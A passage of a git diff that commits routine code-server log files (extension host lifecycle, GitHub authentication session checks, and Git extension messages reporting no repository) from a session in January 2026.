07:11:58.340 [info] Getting sessions for all scopes... +2026-01-26 07:11:58.340 [info] Got 0 sessions for ... +2026-01-26 07:11:58.340 [info] Getting sessions for all scopes... +2026-01-26 07:11:58.340 [info] Got 0 sessions for ... +2026-01-26 07:11:58.340 [info] Getting sessions for all scopes... +2026-01-26 07:11:58.340 [info] Got 0 sessions for ... +2026-01-26 07:11:58.371 [info] Getting sessions for all scopes... +2026-01-26 07:11:58.371 [info] Got 0 sessions for ... +2026-01-26 07:11:58.417 [info] Getting sessions for all scopes... +2026-01-26 07:11:58.417 [info] Got 0 sessions for ... +2026-01-26 07:11:58.417 [info] Getting sessions for all scopes... +2026-01-26 07:11:58.417 [info] Got 0 sessions for ... +2026-01-26 07:11:58.417 [info] Getting sessions for all scopes... +2026-01-26 07:11:58.417 [info] Got 0 sessions for ... +2026-01-26 07:11:58.417 [info] Getting sessions for all scopes... +2026-01-26 07:11:58.417 [info] Got 0 sessions for ... +2026-01-26 07:11:58.417 [info] Getting sessions for all scopes... +2026-01-26 07:11:58.417 [info] Got 0 sessions for ... +2026-01-26 07:12:00.337 [info] Getting sessions for all scopes... +2026-01-26 07:12:00.337 [info] Got 0 sessions for ... diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost5/vscode.github/GitHub.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost5/vscode.github/GitHub.log new file mode 100755 index 0000000..568dea6 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost5/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-26 07:11:58.480 [info] Log level: Info diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost6/remoteExtHostTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost6/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost6/remoteexthost.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost6/remoteexthost.log new file mode 100755 index 0000000..c152af0 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost6/remoteexthost.log @@ -0,0 +1,13 @@ +2026-01-26 07:12:19.529 [info] Extension host with pid 44182 started +2026-01-26 07:12:19.539 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/-14fc42bf/vscode.lock': Lock acquired. +2026-01-26 07:12:19.633 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-26 07:12:19.634 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-26 07:12:19.738 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*' +2026-01-26 07:12:19.757 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-26 07:12:19.829 [info] Eager extensions activated +2026-01-26 07:12:19.829 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-26 07:12:19.829 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-26 07:12:24.154 [info] ExtensionService#_doActivateExtension vscode.git, startup: false, activationEvent: 'api', root cause: vscode.github +2026-01-26 07:12:45.171 [info] Extension host terminating: received terminate message from renderer +2026-01-26 07:12:45.172 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/-14fc42bf/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-26 07:12:45.191 [info] Extension host with pid 44182 exiting with code 0 diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost6/vscode.git/Git.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost6/vscode.git/Git.log new file mode 100755 index 0000000..2777d6c --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost6/vscode.git/Git.log @@ -0,0 +1,10 @@ +2026-01-26 07:12:24.296 [info] [main] Log level: Info +2026-01-26 07:12:24.296 [info] [main] Validating found git in: "git" +2026-01-26 07:12:24.296 [info] [main] Using git "2.39.5" from "git" +2026-01-26 07:12:24.296 [info] [Model][doInitialScan] Initial repository scan started +2026-01-26 07:12:24.296 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 07:12:24.296 [info] fatal: not a git repository (or any of the parent directories): .git +2026-01-26 07:12:24.296 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 07:12:24.296 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:12:24.296 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost6/vscode.github-authentication/GitHub Authentication.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost6/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..70c76d6 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost6/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-26 07:12:19.801 [info] Reading sessions from keychain... +2026-01-26 07:12:19.801 [info] Getting sessions for all scopes... +2026-01-26 07:12:19.801 [info] Got 0 sessions for ... +2026-01-26 07:12:19.801 [info] Getting sessions for all scopes... +2026-01-26 07:12:19.801 [info] Got 0 sessions for ... +2026-01-26 07:12:19.801 [info] Getting sessions for all scopes... +2026-01-26 07:12:19.801 [info] Got 0 sessions for ... +2026-01-26 07:12:19.801 [info] Getting sessions for all scopes... +2026-01-26 07:12:19.801 [info] Got 0 sessions for ... +2026-01-26 07:12:19.801 [info] Getting sessions for all scopes... +2026-01-26 07:12:19.801 [info] Got 0 sessions for ... +2026-01-26 07:12:19.801 [info] Getting sessions for all scopes... +2026-01-26 07:12:19.801 [info] Got 0 sessions for ... +2026-01-26 07:12:19.801 [info] Getting sessions for all scopes... +2026-01-26 07:12:19.801 [info] Got 0 sessions for ... +2026-01-26 07:12:19.801 [info] Getting sessions for all scopes... +2026-01-26 07:12:19.801 [info] Got 0 sessions for ... +2026-01-26 07:12:19.801 [info] Getting sessions for all scopes... +2026-01-26 07:12:19.801 [info] Got 0 sessions for ... +2026-01-26 07:12:19.801 [info] Getting sessions for all scopes... +2026-01-26 07:12:19.801 [info] Got 0 sessions for ... +2026-01-26 07:12:19.801 [info] Getting sessions for all scopes... +2026-01-26 07:12:19.801 [info] Got 0 sessions for ... +2026-01-26 07:12:19.801 [info] Getting sessions for all scopes... +2026-01-26 07:12:19.801 [info] Got 0 sessions for ... +2026-01-26 07:12:19.801 [info] Getting sessions for all scopes... +2026-01-26 07:12:19.801 [info] Got 0 sessions for ... +2026-01-26 07:12:19.801 [info] Getting sessions for all scopes... +2026-01-26 07:12:19.801 [info] Got 0 sessions for ... +2026-01-26 07:12:19.801 [info] Getting sessions for all scopes... +2026-01-26 07:12:19.801 [info] Got 0 sessions for ... +2026-01-26 07:12:21.187 [info] Getting sessions for all scopes... +2026-01-26 07:12:21.187 [info] Got 0 sessions for ... diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost6/vscode.github/GitHub.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost6/vscode.github/GitHub.log new file mode 100755 index 0000000..781c055 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost6/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-26 07:12:19.881 [info] Log level: Info diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost7/remoteExtHostTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost7/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost7/remoteexthost.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost7/remoteexthost.log new file mode 100755 index 0000000..7a19f04 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost7/remoteexthost.log @@ -0,0 +1,13 @@ +2026-01-26 07:12:47.397 [info] Extension host with pid 44738 started +2026-01-26 07:12:47.407 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/-14fc42bf/vscode.lock': Lock acquired. +2026-01-26 07:12:47.492 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-26 07:12:47.493 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-26 07:12:47.598 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-26 07:12:47.618 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-26 07:12:47.619 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-26 07:12:47.761 [info] Eager extensions activated +2026-01-26 07:12:47.761 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-26 07:12:47.762 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-26 07:13:12.583 [info] Extension host terminating: received terminate message from renderer +2026-01-26 07:13:12.583 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/-14fc42bf/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-26 07:13:12.601 [info] Extension host with pid 44738 exiting with code 0 diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost7/vscode.git/Git.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost7/vscode.git/Git.log new file mode 100755 index 0000000..d9d481b --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost7/vscode.git/Git.log @@ -0,0 +1,12 @@ +2026-01-26 07:12:47.800 [info] [main] Log level: Info +2026-01-26 07:12:47.800 [info] [main] Validating found git in: "git" +2026-01-26 07:12:47.800 [info] [main] Using git "2.39.5" from "git" +2026-01-26 07:12:47.800 [info] [Model][doInitialScan] Initial repository scan started +2026-01-26 07:12:47.800 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 07:12:47.800 [info] fatal: not a git repository (or any of the parent directories): .git +2026-01-26 07:12:47.800 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 07:12:47.800 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:12:47.800 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-26 07:12:49.085 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 07:12:49.085 [info] fatal: not a git repository (or any of the parent directories): .git diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost7/vscode.github-authentication/GitHub Authentication.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost7/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..1fa7446 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost7/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-26 07:12:47.693 [info] Reading sessions from keychain... +2026-01-26 07:12:47.693 [info] Getting sessions for all scopes... +2026-01-26 07:12:47.693 [info] Got 0 sessions for ... +2026-01-26 07:12:47.693 [info] Getting sessions for all scopes... +2026-01-26 07:12:47.693 [info] Got 0 sessions for ... +2026-01-26 07:12:47.693 [info] Getting sessions for all scopes... +2026-01-26 07:12:47.693 [info] Got 0 sessions for ... +2026-01-26 07:12:47.693 [info] Getting sessions for all scopes... +2026-01-26 07:12:47.693 [info] Got 0 sessions for ... +2026-01-26 07:12:47.693 [info] Getting sessions for all scopes... +2026-01-26 07:12:47.693 [info] Got 0 sessions for ... +2026-01-26 07:12:47.693 [info] Getting sessions for all scopes... +2026-01-26 07:12:47.693 [info] Got 0 sessions for ... +2026-01-26 07:12:47.693 [info] Getting sessions for all scopes... +2026-01-26 07:12:47.693 [info] Got 0 sessions for ... +2026-01-26 07:12:47.693 [info] Getting sessions for all scopes... +2026-01-26 07:12:47.693 [info] Got 0 sessions for ... +2026-01-26 07:12:47.693 [info] Getting sessions for all scopes... +2026-01-26 07:12:47.693 [info] Got 0 sessions for ... +2026-01-26 07:12:47.694 [info] Getting sessions for all scopes... +2026-01-26 07:12:47.694 [info] Got 0 sessions for ... +2026-01-26 07:12:47.718 [info] Getting sessions for all scopes... +2026-01-26 07:12:47.718 [info] Got 0 sessions for ... +2026-01-26 07:12:47.718 [info] Getting sessions for all scopes... +2026-01-26 07:12:47.718 [info] Got 0 sessions for ... +2026-01-26 07:12:47.718 [info] Getting sessions for all scopes... +2026-01-26 07:12:47.718 [info] Got 0 sessions for ... +2026-01-26 07:12:47.718 [info] Getting sessions for all scopes... +2026-01-26 07:12:47.718 [info] Got 0 sessions for ... +2026-01-26 07:12:47.718 [info] Getting sessions for all scopes... +2026-01-26 07:12:47.718 [info] Got 0 sessions for ... +2026-01-26 07:12:49.080 [info] Getting sessions for all scopes... +2026-01-26 07:12:49.080 [info] Got 0 sessions for ... diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost7/vscode.github/GitHub.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost7/vscode.github/GitHub.log new file mode 100755 index 0000000..6123047 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost7/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-26 07:12:47.835 [info] Log level: Info diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost8/remoteExtHostTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost8/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost8/remoteexthost.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost8/remoteexthost.log new file mode 100755 index 0000000..4d08cf9 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost8/remoteexthost.log @@ -0,0 +1,13 @@ +2026-01-26 07:13:23.174 [info] Extension host with pid 45273 started +2026-01-26 07:13:23.177 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/-14fc42bf/vscode.lock': Lock acquired. +2026-01-26 07:13:23.271 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-26 07:13:23.272 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-26 07:13:23.379 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-26 07:13:23.418 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-26 07:13:23.418 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-26 07:13:23.592 [info] Eager extensions activated +2026-01-26 07:13:23.592 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-26 07:13:23.593 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-26 07:13:28.838 [info] Extension host terminating: received terminate message from renderer +2026-01-26 07:13:28.839 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/-14fc42bf/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-26 07:13:28.883 [info] Extension host with pid 45273 exiting with code 0 diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost8/vscode.git/Git.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost8/vscode.git/Git.log new file mode 100755 index 0000000..038915b --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost8/vscode.git/Git.log @@ -0,0 +1,12 @@ +2026-01-26 07:13:23.635 [info] [main] Log level: Info +2026-01-26 07:13:23.635 [info] [main] Validating found git in: "git" +2026-01-26 07:13:23.635 [info] [main] Using git "2.39.5" from "git" +2026-01-26 07:13:23.635 [info] [Model][doInitialScan] Initial repository scan started +2026-01-26 07:13:23.635 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 07:13:23.635 [info] fatal: not a git repository (or any of the parent directories): .git +2026-01-26 07:13:23.635 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 07:13:23.635 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:13:23.635 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-26 07:13:25.702 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 07:13:25.702 [info] fatal: not a git repository (or any of the parent directories): .git diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost8/vscode.github-authentication/GitHub Authentication.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost8/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..eadb4e8 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost8/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-26 07:13:23.497 [info] Reading sessions from keychain... +2026-01-26 07:13:23.497 [info] Getting sessions for all scopes... +2026-01-26 07:13:23.497 [info] Got 0 sessions for ... +2026-01-26 07:13:23.497 [info] Getting sessions for all scopes... +2026-01-26 07:13:23.497 [info] Got 0 sessions for ... +2026-01-26 07:13:23.497 [info] Getting sessions for all scopes... +2026-01-26 07:13:23.497 [info] Got 0 sessions for ... +2026-01-26 07:13:23.497 [info] Getting sessions for all scopes... +2026-01-26 07:13:23.497 [info] Got 0 sessions for ... +2026-01-26 07:13:23.497 [info] Getting sessions for all scopes... +2026-01-26 07:13:23.497 [info] Got 0 sessions for ... +2026-01-26 07:13:23.497 [info] Getting sessions for all scopes... +2026-01-26 07:13:23.497 [info] Got 0 sessions for ... +2026-01-26 07:13:23.497 [info] Getting sessions for all scopes... +2026-01-26 07:13:23.497 [info] Got 0 sessions for ... +2026-01-26 07:13:23.497 [info] Getting sessions for all scopes... +2026-01-26 07:13:23.497 [info] Got 0 sessions for ... +2026-01-26 07:13:23.497 [info] Getting sessions for all scopes... +2026-01-26 07:13:23.497 [info] Got 0 sessions for ... +2026-01-26 07:13:23.514 [info] Getting sessions for all scopes... +2026-01-26 07:13:23.514 [info] Got 0 sessions for ... +2026-01-26 07:13:23.542 [info] Getting sessions for all scopes... +2026-01-26 07:13:23.542 [info] Got 0 sessions for ... +2026-01-26 07:13:23.542 [info] Getting sessions for all scopes... +2026-01-26 07:13:23.542 [info] Got 0 sessions for ... +2026-01-26 07:13:23.542 [info] Getting sessions for all scopes... +2026-01-26 07:13:23.542 [info] Got 0 sessions for ... +2026-01-26 07:13:23.542 [info] Getting sessions for all scopes... +2026-01-26 07:13:23.542 [info] Got 0 sessions for ... +2026-01-26 07:13:23.542 [info] Getting sessions for all scopes... +2026-01-26 07:13:23.542 [info] Got 0 sessions for ... +2026-01-26 07:13:25.702 [info] Getting sessions for all scopes... +2026-01-26 07:13:25.702 [info] Got 0 sessions for ... diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost8/vscode.github/GitHub.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost8/vscode.github/GitHub.log new file mode 100755 index 0000000..1bed3fd --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost8/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-26 07:13:23.674 [info] Log level: Info diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost9/remoteExtHostTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost9/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost9/remoteexthost.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost9/remoteexthost.log new file mode 100755 index 0000000..2756400 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost9/remoteexthost.log @@ -0,0 +1,13 @@ +2026-01-26 07:13:31.218 [info] Extension host with pid 45724 started +2026-01-26 07:13:31.227 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/3d7c237e/vscode.lock': Lock acquired. +2026-01-26 07:13:31.324 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-26 07:13:31.326 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-26 07:13:31.429 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-26 07:13:31.454 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-26 07:13:31.455 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-26 07:13:31.592 [info] Eager extensions activated +2026-01-26 07:13:31.592 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-26 07:13:31.592 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-26 07:13:38.945 [info] Extension host terminating: received terminate message from renderer +2026-01-26 07:13:38.946 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/3d7c237e/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-26 07:13:38.978 [info] Extension host with pid 45724 exiting with code 0 diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost9/vscode.git/Git.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost9/vscode.git/Git.log new file mode 100755 index 0000000..d3a5607 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost9/vscode.git/Git.log @@ -0,0 +1,47 @@ +2026-01-26 07:13:31.628 [info] [main] Log level: Info +2026-01-26 07:13:31.628 [info] [main] Validating found git in: "git" +2026-01-26 07:13:31.628 [info] [main] Using git "2.39.5" from "git" +2026-01-26 07:13:31.628 [info] [Model][doInitialScan] Initial repository scan started +2026-01-26 07:13:31.628 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 07:13:31.628 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:13:31.629 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 07:13:31.629 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:13:31.633 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 07:13:31.633 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:13:31.660 [info] > git rev-parse --show-toplevel [24ms] +2026-01-26 07:13:31.660 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:13:31.667 [info] > git rev-parse --show-toplevel [3ms] +2026-01-26 07:13:31.667 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:13:31.672 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 07:13:31.672 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:13:31.676 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 07:13:31.676 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:13:31.681 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 07:13:31.681 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:13:31.688 [info] > git rev-parse --show-toplevel [4ms] +2026-01-26 07:13:31.688 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:13:31.693 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 07:13:31.693 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:13:31.697 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 07:13:31.697 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:13:31.701 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 07:13:31.701 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:13:31.705 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 07:13:31.705 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 07:13:31.708 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-26 07:13:32.871 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 07:13:32.871 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost9/vscode.github-authentication/GitHub Authentication.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost9/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..15e7909 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost9/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-26 07:13:31.521 [info] Reading sessions from keychain... +2026-01-26 07:13:31.521 [info] Getting sessions for all scopes... +2026-01-26 07:13:31.521 [info] Got 0 sessions for ... +2026-01-26 07:13:31.521 [info] Getting sessions for all scopes... +2026-01-26 07:13:31.521 [info] Got 0 sessions for ... +2026-01-26 07:13:31.521 [info] Getting sessions for all scopes... +2026-01-26 07:13:31.521 [info] Got 0 sessions for ... +2026-01-26 07:13:31.521 [info] Getting sessions for all scopes... +2026-01-26 07:13:31.521 [info] Got 0 sessions for ... +2026-01-26 07:13:31.521 [info] Getting sessions for all scopes... +2026-01-26 07:13:31.521 [info] Got 0 sessions for ... +2026-01-26 07:13:31.521 [info] Getting sessions for all scopes... +2026-01-26 07:13:31.521 [info] Got 0 sessions for ... +2026-01-26 07:13:31.521 [info] Getting sessions for all scopes... +2026-01-26 07:13:31.521 [info] Got 0 sessions for ... +2026-01-26 07:13:31.521 [info] Getting sessions for all scopes... +2026-01-26 07:13:31.521 [info] Got 0 sessions for ... +2026-01-26 07:13:31.521 [info] Getting sessions for all scopes... +2026-01-26 07:13:31.521 [info] Got 0 sessions for ... +2026-01-26 07:13:31.521 [info] Getting sessions for all scopes... +2026-01-26 07:13:31.521 [info] Got 0 sessions for ... +2026-01-26 07:13:31.545 [info] Getting sessions for all scopes... +2026-01-26 07:13:31.545 [info] Got 0 sessions for ... +2026-01-26 07:13:31.545 [info] Getting sessions for all scopes... +2026-01-26 07:13:31.545 [info] Got 0 sessions for ... +2026-01-26 07:13:31.545 [info] Getting sessions for all scopes... +2026-01-26 07:13:31.546 [info] Got 0 sessions for ... +2026-01-26 07:13:31.546 [info] Getting sessions for all scopes... +2026-01-26 07:13:31.546 [info] Got 0 sessions for ... +2026-01-26 07:13:31.546 [info] Getting sessions for all scopes... +2026-01-26 07:13:31.546 [info] Got 0 sessions for ... +2026-01-26 07:13:32.880 [info] Getting sessions for all scopes... +2026-01-26 07:13:32.880 [info] Got 0 sessions for ... diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost9/vscode.github/GitHub.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost9/vscode.github/GitHub.log new file mode 100755 index 0000000..702ecc4 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost9/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-26 07:13:31.671 [info] Log level: Info diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/ptyhost.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/ptyhost.log new file mode 100755 index 0000000..79950b8 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/ptyhost.log @@ -0,0 +1,4 @@ +2026-01-25 23:36:18.829 [info] Expanding terminal instance, old id -53e2bffc-1 -> new id undefined +2026-01-25 23:36:23.006 [warning] Persistent process "1": Process had no disconnect runners but was an orphan +2026-01-25 23:36:23.006 [info] Persistent process reconnection "1" +2026-01-25 23:36:23.036 [info] Persistent process "1": Replaying 39 chars and 1 size events diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/remoteTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/remoteTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git 